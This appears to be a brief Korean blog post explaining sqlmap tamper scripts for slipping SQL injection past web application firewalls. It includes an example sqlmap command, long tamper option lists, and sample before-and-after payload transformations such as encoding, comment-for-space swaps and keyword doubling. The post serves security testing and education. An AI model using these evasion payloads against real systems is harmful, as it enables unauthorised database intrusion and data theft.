SQLMap Tamper Script를 이용한 WAF&Protection Logic Bypass

by hahwul 1 min read

SQLMap의 Tamper script 관련하여 정리해둡니다.

보통 많이 사용하는 Tamper script

--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes

--tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords

e.g

#> sqlmap -u "http://127.0.0.1?q=target" --dbs --no-cast --level 3 --tamper=apostrophemask,apostrophenullencode,base64encode,between

Tamper scripts

apostrophemask: utf8로 인코딩 처리

apostrophenullencode: ‘(quot) 앞에 (null) 붙여줌

  • ’ 입력 시 %27로 들어감

base64encode: Base64로 인코딩

between: NOT BETWEEN 0 AND 구문 사용(

  • Mysql(4,5,5.5), Mssql2005, Oracle 10g, PostgreSQL 8.3~4, 9.0) 전용

chardoubleencode: 공백을 %09 인코딩

charencode: URl 인코딩 두번(보편적으로 Double URL Encoding 이라고 부르는 것들)

  • ’ 가 %2527 형태로..

charunicodeencode: URL 인코딩인데 between 처럼 버전 제한

  • Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
  • SELECT FIELD%20FROM TABLE ==> %u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045

equaltolike: equal 구문 대신 LIKE 구문으로 처리

  • Mssql 2005、MySQL 4, 5.0 and 5.5
  • SELECT * FROM users WHERE id=1 ==> SELECT * FROM users WHERE id LIKE 1

greatest:

  • MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
  • 1 AND A > B ==> 1 AND GREATEST(A,B+1)=A

ifnull2ifisnull:

  • MySQL 5.0 and 5.5
  • IFNULL(1, 2) ==> IF(ISNULL(1),2,1)

multiplespaces: 공백 여러개 넣음

nonrecursivereplacement: 중복구문 처리

  • 1 UNION SELECT 2 - ==> 1 UNION SELESELECTCT 2-

percentage: 구문 사이에 % 삽입

  • SELECT FIELD FROM TABLE ==> %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E

randomcase: 대소문자 랜덤 삽입

  • INSERT ==> InseRt

securesphere: ????

  • 1 AND 1=1 ==> 1 AND 1=1 and ‘zzz’=’zzz’

space2comment: 공백 자리를 주석 처리

  • SELECT id FROM users ==> SELECT//id//FROM/**/users

space2plus: 공백 자리를 + 처리

  • SELECT id FROM users ==> SELECT+id+FROM+users

space2randomblank: CRLF(%0d%a) 삽입

  • SELECT id FROM users ==> SELECT%0Did%0DFROM%0Ausers

unionalltounion: ALL SELECT를 그냥 SELECT로 변경

  • 1 UNION ALL SELECT ==> -1 UNION SELECT

unmagicquotes:

  • 1’ AND 1=1 ==> 1%bf%27 -

이외에도 추가로 더 있는데, 아래 링크 참고해주세요 https://github.com/sqlmapproject/sqlmap/tree/master/tamper